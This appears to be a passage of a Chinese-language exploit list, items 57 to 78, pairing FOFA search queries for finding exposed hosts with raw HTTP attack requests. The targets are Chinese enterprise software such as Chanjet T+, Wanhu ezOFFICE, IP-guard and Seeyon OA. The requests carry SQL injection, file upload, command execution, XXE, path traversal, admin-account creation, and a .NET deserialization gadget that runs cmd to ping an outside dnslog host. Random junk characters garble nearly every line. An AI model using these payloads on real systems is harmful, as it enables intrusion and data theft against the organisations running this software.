User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.364 \7 a6 S9 f* N" W6 G' |4 e
Content-Type: application/json
) p. W! G& ~; G3 ^2 P$ v- f+ J3 I+ C* ^0 @7 N' C% V# y* e# m
{
& d% O' Q* U5 E8 g2 B "storeID":{9 j) x2 C& h+ Y: X: e( u5 ?
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",8 d9 J( E6 `+ r( P
"MethodName":"Start",4 V$ f' a* s w: x7 ~$ a
"ObjectInstance":{7 N; U/ s! O( s
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% x9 N4 ?# D3 h8 ^ "StartInfo": {7 [- w' ?2 _9 O+ d& W! }( ?
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 H2 e+ v8 j* L7 M4 P' P' _ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"6 P3 j7 @6 p: o( w
}
" I- u6 K& [# v2 U+ \# A) b }# g9 a+ {' n3 m/ A2 _
}2 W5 j* Q9 F' N9 C0 V& c
}6 y4 m" n$ y/ G" E% ^
: O3 ] h$ G }( Z* }) h
3 }$ B, V! w: ~0 w; W9 j2 v" m
57. 畅捷通T+ keyEdit.aspx SQL注入. C. e! |8 {1 ^; m* x4 C
FOFA:app="畅捷通-TPlus"2 t1 E8 v. `$ E
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1- V: S b* o/ U! g1 q
Host: host
) O+ [, M0 D4 o: [2 ?User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! U g2 O* l E* N6 e& O: v& I
Accept-Charset: utf-8" K* m6 x9 X9 H
Accept-Encoding: gzip, deflate3 x/ F* B0 @! f; f0 Z
Connection: close# u; m7 U+ d& B! c& C9 t/ p+ `- l
- B" K7 Y: ]$ V
" E! M7 k, ^) y2 O
58. 畅捷通T+ KeyInfoList.aspx sql注入' G1 |$ R |" k1 w- O+ e
FOFA:app="畅捷通-TPlus"
3 Q" f( [( i1 A8 m1 u2 O2 @& NGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
0 ^0 S" P5 [3 G& y: D0 I! T( WHost: your-ip" B/ j6 P5 n8 M4 }8 n, B
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 t$ t' H0 F. @# e9 ~4 Z: j) yAccept-Charset: utf-8
1 z$ g* b" ]1 K2 }- u' N6 t6 ?: oAccept-Encoding: gzip, deflate, S+ `3 ~& g; T
Connection: close5 \ o/ }- X( |# q* G( T$ p
4 ~3 g/ A S) p. r5 e y/ ]0 r+ u
) D# V6 U3 U4 b% e59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行% f( L3 l& s7 A' H
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
, W8 t: A( W5 w5 o0 f8 f, m/ GPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.19 w) W% {, v5 X& y W+ |
Host: 192.168.86.128:9090
! M2 ^0 p2 F) o2 xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.362 V" B% A: G. P+ U
Connection: close# H: _% N6 G1 w3 V
Content-Length: 1669; q& d+ E8 i9 a
Accept: */*
2 U" A6 `$ R+ g; Z! oAccept-Language: en; \ y+ f9 x6 W* s) B, d
Content-Type: application/x-www-form-urlencoded
( S! y; c2 y' {: HAccept-Encoding: gzip
5 t4 ~, [9 l& I. i9 r. a# e5 l1 H) `
PAYLOAD
0 s6 i% Y _# }$ k. }- B& {+ P" v- U4 }( q# }! J
' v8 k; o7 I. e4 a9 w& ?2 s- U
60. 百卓Smart管理平台 importexport.php SQL注入
. S" C& \9 G3 t3 t; LFOFA:title="Smart管理平台"
& g$ c; J) Y' x# Q* {+ zGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1' t9 P2 C1 S' [! T" E! B
Host:" Q( t3 S ~$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 B/ R8 r [( E, p q) G+ qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- e( v+ b+ H: P" r. k9 B7 pAccept-Encoding: gzip, deflate
8 f, t. I& i8 t4 J, TAccept-Language: zh-CN,zh;q=0.9; V0 A7 a+ Y1 O3 f8 {7 X
Connection: close
" J9 P( W! u1 m/ _0 l! V+ K$ s! q3 g9 A
0 H" ~% c% ^7 z8 I# R( u61. 浙大恩特客户资源管理系统 fileupload 任意文件上传" E7 y( ~) S- G; W) p1 B" {
FOFA: title="欢迎使用浙大恩特客户资源管理系统"# f& d+ n$ ?" C" k4 v* K; [
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1 C1 [& p6 \& Y2 G/ w
Host: x.x.x.x
' i- O9 O; g/ D3 R' A8 b3 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( _9 C8 u+ C8 \( F' Q- fConnection: close
! v4 j7 q5 O/ z% R4 VContent-Length: 27
- Z/ B3 y3 }7 YAccept: */*1 f- U, W; _- k: ~ O5 v, A
Accept-Encoding: gzip, deflate% j9 L. `8 M2 Y( I6 ^- F" e8 b7 A
Accept-Language: en
. O4 [/ x( z9 u! V$ hContent-Type: application/x-www-form-urlencoded
7 t' K6 t+ `* D& l3 c7 v! [
/ }1 I" I, p7 a& Z2 V5 G8uxssX66eqrqtKObcVa0kid98xa
- ?% L$ j) r8 O8 f3 H. ~) y, a. e6 B. }# U' I' p g" X
- f; J; ?" ^" C! Z62. IP-guard WebServer 远程命令执行, a( p1 l5 D3 ~' ]% f( ]6 c* \
FOFA:"IP-guard" && icon_hash="2030860561"
) r, u' Q! W8 d; ?/ o) pGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1: f2 M! V) ~! f$ T
Host: x.x.x.x
& b% N) f0 v+ Z! j& {User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36, u+ w/ t7 j: a3 W* z
Connection: close+ N& A7 q+ v0 w
Accept: */*
3 Q: {2 M+ }! p8 p4 LAccept-Language: en
, v3 n7 p" f* o! AAccept-Encoding: gzip
+ b. N& K0 S: ~8 N) k ^+ @( r. Z
8 B0 p: d4 G2 F
$ d& }$ q: N" ]0 `" Q% I访问: ]; p( O; Y8 `2 N5 a
) t) N/ Z' J) m. M9 W2 AGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1, |0 B" a2 W0 j! F8 o( @
Host: x.x.x.x# S3 H2 q# ]9 r4 ]. U: |! K8 o* Y
% r1 H' ?6 c& Z$ x% k$ J- a( F6 G/ W) e; o; D6 o. V2 s
63. IP-guard WebServer任意文件读取
, s3 @( J |, U) tIP-guard < 4.82.0609.0
. }' B# F6 j$ X5 W; A; ?' lFOFA:icon_hash="2030860561"9 W) S8 z3 r7 s& Q
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
- A6 I0 X6 D+ j/ u- z& m. oHost: your-ip; A" V+ F/ J/ [8 F$ [# n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ S3 y, g. n0 y6 \ YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 j0 ~4 d1 @) S, D+ mAccept-Encoding: gzip, deflate
4 g: i. ?. M! P% W0 DAccept-Language: zh-CN,zh;q=0.9% e8 l+ \# m# s4 P
Connection: close; j# I D3 e# |8 p$ g p
Content-Type: application/x-www-form-urlencoded
: u/ e* z9 @7 v* K' ^- X, E. S. `+ W! b
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
, C7 F' F3 \" G9 u0 U" D! y. q# W+ u) Z3 c5 O
64. 捷诚管理信息系统CWSFinanceCommon SQL注入% Z2 m; V4 k) L3 f
FOFA:body="/Scripts/EnjoyMsg.js"* s8 ?: a% h6 \( e, g
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1- E) [& @# Z8 {/ l- P0 ~7 P0 Z
Host: 192.168.86.128:9001
6 o9 _& |0 j; f3 p( AUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 g/ |! o- T$ M4 T" V2 y
Connection: close7 n5 ?+ ] _1 }! K
Content-Length: 369
+ X; A7 r9 S) X$ P; u2 QAccept: */*
* _/ C3 h- s7 d/ G+ Y6 t5 AAccept-Language: en& Q, j" d5 e! r6 F; y
Content-Type: text/xml; charset=utf-8% A; @3 j! M1 ?
Accept-Encoding: gzip
$ Q) d$ Y- ~% I2 k' @# i6 j! E. Q. ^9 m- g3 S! Y
<?xml version="1.0" encoding="utf-8"?>9 ]5 C# ~8 b6 k
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">9 R+ F8 r& v5 O$ D( `0 o9 m6 v
<soap:Body>
- k) f7 \" L2 b; J <GetOSpById xmlns="http://tempuri.org/">
7 i8 f. i% G+ X8 ]3 z! T i <sId>1';waitfor delay '0:0:5'--+</sId> T/ C! n( T( y# E
</GetOSpById> g% A; G" z2 T& [ P1 J
</soap:Body>7 k4 z' A( |% x7 g
</soap:Envelope>8 i. u( k: R+ I+ h F( _; V
& k/ J. S% m+ C l. Q
4 R$ S t2 b; n9 p& K7 X
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过5 V. c& p$ w' o& O+ Q4 }( n1 F
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"$ o9 N" k, n0 q
响应200即成功创建账号test123456/123456
+ v. W6 C& U/ T& e+ Q6 wPOST /SystemMng.ashx HTTP/1.1
# `5 j5 u' i; S) N' G1 r6 k4 C FHost:
! G8 t5 g8 N" k( k9 @User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)+ e0 b& d h: [3 k* T
Accept-Encoding: gzip, deflate
- s' \: n6 o$ {" k9 g% x3 jAccept: */*
* w/ \" |2 u4 W8 l3 WConnection: close
$ T, D: F* \0 w) s2 JAccept-Language: en. Q% H& Y0 h5 E, w/ Y9 W; |9 S
Content-Length: 174: Q( u" q$ e$ @' I$ j. P3 x
; O8 A+ P7 E6 w4 f2 l2 W/ poperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
8 b+ J; p5 b) l: U8 [7 ]
8 T9 ]1 i* t& x4 c9 t4 M, q* N
, r# E* c# N8 l66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% L5 g; V2 m% MFOFA:app="万户ezOFFICE协同管理平台"
, {# L- ]' h6 n! y* Y( X# W# f
5 ]& s* q( L% F1 B$ ]* Y- s! V) bGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1% i4 y J, K2 f. |( _2 M4 I
Host: x.x.x.x; I; u* b% Y6 _6 E0 o% r2 L; V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 u9 U7 o+ l: S) ^3 Y
Connection: close
: }+ m- I' g+ p/ w6 ^$ N5 g3 qAccept: */*
1 q, d' e% U5 n2 ]# |1 T3 _( dAccept-Language: en
) V5 X4 R* m2 {; V2 l- \9 H7 yAccept-Encoding: gzip
2 T2 Z# \& I* i3 L* e
) n" K6 `7 Z" f3 M3 a5 m
) s2 K0 o0 o. t6 `( ~* k& [ T第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在: J2 M! F6 p6 o4 V8 s* x- [ j
: [4 c- Y U) C67. 万户ezOFFICE wpsservlet任意文件上传
' E, d5 K7 g5 l- kFOFA:app="万户网络-ezOFFICE"
5 U& s9 i( _' ~; w' r8 l/ ^newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型+ h Q$ U0 @: i. w
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
9 x8 Z5 \- a2 o) [Host: x.x.x.x
3 J* g9 e3 w, `User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 l/ P/ F/ c7 R1 V3 n
Content-Length: 173
: m0 @& s; A& W! NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.87 P9 R/ x/ X1 o, {( j; z+ A
Accept-Encoding: gzip, deflate
2 m& ^! z2 g; w. K+ nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
' P) _0 T3 _3 p6 O. T/ q" JConnection: close
# M1 s$ J9 ]3 j7 y( R6 f3 P& A, \Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
( L- B! r# G W4 c: M6 p/ sDNT: 1
* j& B* s- u/ `" J# n# Q$ vUpgrade-Insecure-Requests: 1; B# k. }& A+ E Z
' ?4 d1 g1 @- D
--ufuadpxathqvxfqnuyuqaozvseiueerp$ e1 r" o$ P y! X. }% g
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
8 e) Y1 _5 [! x4 q
0 I. j+ g6 h8 \* c) Z<% out.print("sasdfghjkj");%>
; X4 D. B# M8 A6 r--ufuadpxathqvxfqnuyuqaozvseiueerp--
; b, F9 [4 m; N4 M
; ~3 R. Q3 r& ^ ~/ v( X! U+ k: Y6 }7 J: a
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp% ^ }0 A- _& j! H$ p Q7 ?0 |# Q
4 K# l, |/ [' u$ h0 s( O, D68. 万户ezOFFICE wf_printnum.jsp SQL注入
. U6 O# ]- k VFOFA:app="万户ezOFFICE协同管理平台"
& o" V/ R" O- R% U- N% CGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1- ? u- i1 {& P* L
Host: {{host}}
8 ^1 F. j7 w# M$ o6 O" g$ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36( I- c- {2 b( u) ^2 {. n) R
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
; L4 T5 f5 g4 _Accept-Encoding: gzip, deflate$ p5 R, g' J6 g! Y$ |8 `) f
Accept-Language: zh-CN,zh;q=0.9 v# @* k# a- r* s, k
Connection: close
1 e/ Z/ p2 @3 Q& C
`. i/ `; L! W) |8 G! i2 \% B! O" [7 Z& L' {
69. 万户 ezOFFICE contract_gd.jsp SQL注入
! G1 x% P+ y: q% T' ~- VFOFA:app="万户ezOFFICE协同管理平台"
- Y1 q, N! J/ E3 g, FGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.16 A* C- v$ c1 g8 N( `! i5 y
Host: your-ip
0 K2 s0 P9 u1 N0 }/ D3 U0 T+ TUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! g& P9 |+ i W* @) H9 U: J1 Z' wAccept-Encoding: gzip, deflate% x2 k* k+ d" g/ V. L, M7 G# }8 ^
Accept: */*, b8 c: ~* z8 }, S$ z3 M6 U
Connection: keep-alive
- H. }- Z/ k0 q8 v% W# |8 F! ]4 u7 `
; O3 q! D; g. A) m' z2 Y
70. 万户ezEIP success 命令执行
3 H/ l# `# X( Q. v' }( U7 ~FOFA:app="万户网络-ezEIP"
' v; s, I8 ?- fPOST /member/success.aspx HTTP/1.13 b+ @$ B. E6 T9 u2 S
Host: {{Hostname}}# L, i0 e1 k4 m* q8 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ F; ~; {( ~" i6 hSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
/ S( J. H. g2 RContent-Type: application/x-www-form-urlencoded* [0 l3 J2 [% r% v
TYPE: C
' Z' k' e! v. VContent-Length: 16702
8 w& Q7 M9 F8 _( g* m" c( Y4 F3 |" W; i, u, ^( D
__VIEWSTATE=PAYLOAD
, S4 i2 J# C; p
6 ^3 n6 Q( y9 y. i" M5 |1 w8 y. ?0 k% E" r! `+ l$ x% @
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入# y- O/ x& H; ]3 R
FOFA:body="PM2项目管理系统BS版增强工具.zip"
5 W) N; F9 e' E2 h& t9 a2 VGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
* p7 L1 c- s9 f- Q+ i8 E4 N E4 aHost: x.x.x.xx.x.x.x
! P$ C7 C) }0 H2 m# X) b- J) }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Y* D0 t8 v( DConnection: close) _9 }1 H! t$ }. d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, m: F0 W4 O6 ^- O" EAccept-Encoding: gzip, deflate# G" P' u# f5 o: z, X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# z1 ~( ~) H2 B
Upgrade-Insecure-Requests: 1
3 Q% G D/ }5 g& ~% H8 D$ q
$ o! g9 k7 e, g3 f2 ^' c/ n
/ }' Y; f) r0 U. V72. 致远OA getAjaxDataServlet XXE! M: S# h% y: Y2 s# a. L4 d8 S ]
FOFA:app="致远互联-OA"
. k% u% o9 R0 E! `; tPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
9 y+ I$ R% C9 O% `& BHost: 192.168.40.131:8099
* l+ }9 z& r/ tUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36) f, w' J" l* d
Connection: close- B* F1 @1 b C: m3 y+ n
Content-Length: 583
& q% k! i( x6 L% b4 L0 y$ o0 f/ BContent-Type: application/x-www-form-urlencoded
8 }* R$ i& s; rAccept-Encoding: gzip! O9 m1 F; i$ N' c# `3 G7 [
2 \& M3 @2 u; _0 xS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
C3 O1 k( s: h1 g% E1 H! X; y
; U5 b# c( |- x8 w- y4 p+ A( c) y. U/ S* Z. ]
73. GeoServer wms远程代码执行
3 g/ K$ t9 g @. F/ G5 OFOFA:icon_hash=”97540678”
% v. b2 ]! q/ o4 @$ O8 bPOST /geoserver/wms HTTP/1.1
" `+ b% n- q1 H+ K* A7 v7 yHost:
2 K9 ?6 Z, u5 l; hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
# {$ d5 N) o) PContent-Length: 1981
/ D. `* n& M: I, ?, V+ y# ? m; `Accept-Encoding: gzip, deflate6 G, S6 J" W% e" v2 z+ S
Connection: close
; D2 ]6 m* ^) b7 b& `( BContent-Type: application/xml
4 }; Q' P9 [7 C3 eSL-CE-SUID: 3
- ]8 u( G5 C) ?
! |& v- G0 y( R3 w: vPAYLOAD
' J( O, z2 u( {5 z
* M, w) v# k+ X: U6 |! v C9 ?
d2 e5 u2 Z3 R3 d+ ^; }% E74. 致远M3-server 6_1sp1 反序列化RCE$ k: S, [% B% v& l
FOFA:title="M3-Server"& g3 ^; }/ \6 r0 k7 P5 }- L
PAYLOAD& o2 Y6 h h( ?* e
a# i* u+ r; m/ t; u8 {$ d8 e8 @75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, H9 {4 [ j" G) M/ X1 P% K
FOFA:app="TELESQUARE-TLR-2005KSH"' {$ v) s* k* v7 ]0 q' o- b
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
7 L9 K# O( x+ B( r) kHost: x.x.x.x! C& `2 f2 ^$ z, i* m( z; }5 t4 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* f. {# Q0 o+ K. ]3 CConnection: close% q1 r" T, G! U. Z A% j
Accept: */*
! n C: |# o' dAccept-Language: en' U/ {0 h+ H& h! C+ p0 Y! y$ s
Accept-Encoding: gzip
6 N) t$ a) v8 A/ k
8 d# W$ b: Q( W' J8 p! O
7 t+ b% U* ]: Y8 L! c qGET /cgi-bin/test28256.txt HTTP/1.15 c% P- n# e0 b) A- x0 ~0 B
Host: x.x.x.x
6 {( F) W- ]8 k" }8 }* {; M
) W- q& _$ f" d* L v/ {0 \9 v
+ j+ H) p6 z5 \# P+ M76. 新开普掌上校园服务管理平台service.action远程命令执行
3 V& M/ j$ _- E1 N# bFOFA:title="掌上校园服务管理平台", e' f# r W. l3 v; R* k
POST /service_transport/service.action HTTP/1.10 M+ W+ d3 @* l1 Q
Host: x.x.x.x
, l& {) u) Z. v' GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
3 u3 k6 z3 N% aConnection: close
, { s9 U( Z: Z3 y" lContent-Length: 2114 V9 X3 l' x% a: h4 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
w: J) l7 d+ S# |Accept-Encoding: gzip, deflate
. e0 d* a- L, W9 g; LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% {* a9 v3 ^ Y, M
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4( B) j% x- q( a
Upgrade-Insecure-Requests: 1
, h2 v/ k3 X! Q9 F* x& k, a- V, [) Y- K# e
{2 O: R5 w4 a, a$ }
"command": "GetFZinfo",4 M1 U) T7 `! S4 ]# P5 ~5 B
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\": f4 Z- g3 F( Q* ?! R
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
: h, x( G( ]" h( }( C- ]}; J% f: \7 f; Z
( L8 Q# _/ E1 I
, Q8 Q; p7 ]6 X z+ T! nGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
4 y0 [4 ~5 O) y, ?Host: x.x.x.x3 U: d @$ W; F7 l2 z* a9 W
! q/ k) O2 V5 Y' s P
4 H2 n9 W0 `% P" d. Z3 a' {6 |1 z& t8 y0 q& S
77. F22服装管理软件系统UploadHandler.ashx任意文件上传1 c/ T7 ]4 h- [/ v% ^
FOFA:body="F22WEB登陆" A9 Q9 @ x) v7 N, ?
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1) Y# ?# k: |8 ?8 o( M0 Q: U* v( X$ V/ D
Host: x.x.x.x7 ]; Z0 C2 c+ @, B! o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; s' G/ t N; Z0 w3 eConnection: close# y- F, \, P/ t# g) F
Content-Length: 4334 n) h8 ^5 q; L; e7 {
Accept: */*
( b( p* ^1 u6 P- f6 z0 nAccept-Encoding: gzip, deflate
6 r1 L3 S' g3 F+ g" t2 @# K; XAccept-Language: zh-CN,zh;q=0.9
' S$ h: @" Q5 J- S9 W0 C# J7 d0 `Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
o0 t" h8 W: u) m% L
# P2 \8 y% i y------------398jnjVTTlDVXHlE7yYnfwBoix7 [$ l2 A& v7 d3 r* [" h
Content-Disposition: form-data; name="folder"2 |: ]/ E3 @/ f3 I3 g* m
9 ~) ?7 d: ^1 B; s% Y8 r3 r: Q/upload/udplog" Z( e/ A" T" J' R
------------398jnjVTTlDVXHlE7yYnfwBoix* n; W( u4 Q$ p
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
5 w/ p, H8 J$ v& VContent-Type: application/octet-stream
+ W/ q5 P @; T9 F! |
; ?# Y1 V% J- I J& x! jhello1234567
; v2 T% G- P, B8 X3 {/ T------------398jnjVTTlDVXHlE7yYnfwBoix
* @& i( V5 c& J7 \Content-Disposition: form-data; name="Upload"
5 W0 C. n" Q$ V1 A+ l/ C: {( N, C. J4 E' x1 a/ p; }6 E @' R1 |2 ?
Submit Query+ X3 f! w9 v& I6 @
------------398jnjVTTlDVXHlE7yYnfwBoix--
+ s. y. U% W, ]7 a) ]' Q6 X3 T& I+ {* S% o" A5 y$ F
0 {4 ^1 q' f; e" P* r: G
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
- ]( c. h) }2 z9 p# m2 pFOFA:icon_hash="2001627082"
6 a5 s! m1 m3 W0 hPOST /Platform/System/FileUpload.ashx HTTP/1.1
# N: O7 M0 D+ ]" M/ ZHost: x.x.x.x
- Z# g9 S! `& _$ B5 ~; g, uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 j+ C& u1 k; F4 @Connection: close2 q1 k7 M) S$ B0 |
Content-Length: 3365 o M( R: B. @8 y v8 l3 t" p
Accept-Encoding: gzip
) X" Z/ x3 O8 |7 O; g( {Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l8 A: P1 B w2 W) v
4 ^9 |/ w% B1 f+ Y/ m8 v
------YsOxWxSvj1KyZow1PTsh98fdu6l
# |) U8 E/ N Y/ |/ j8 X2 H( f' nContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
( l7 |: t2 r2 L V" [; P5 {Content-Type: image/png3 W/ P1 y# j) ?; `* p8 C
3 S" i2 j% n3 I1 [& N3 B8 @YsOxWxSvj1KyZow1PTsh98fdu6l) F& y$ U9 H7 ^' v
------YsOxWxSvj1KyZow1PTsh98fdu6l' k( ?7 l$ x" _! ? E( n8 \* }9 s
Content-Disposition: form-data; name="target"9 X' s; Q, k, _6 Q X3 l
( f% N# ?( {4 {8 \) ~. a# Q* ~( J
/Applications/SkillDevelopAndEHS/
0 I& j1 F; ]( H( F------YsOxWxSvj1KyZow1PTsh98fdu6l--5 T# I+ i) a5 T1 b- V5 T6 Q- l& k
. X0 T, w7 E) Y- ]7 a" P
4 _* M; G9 G, L, X7 l+ F
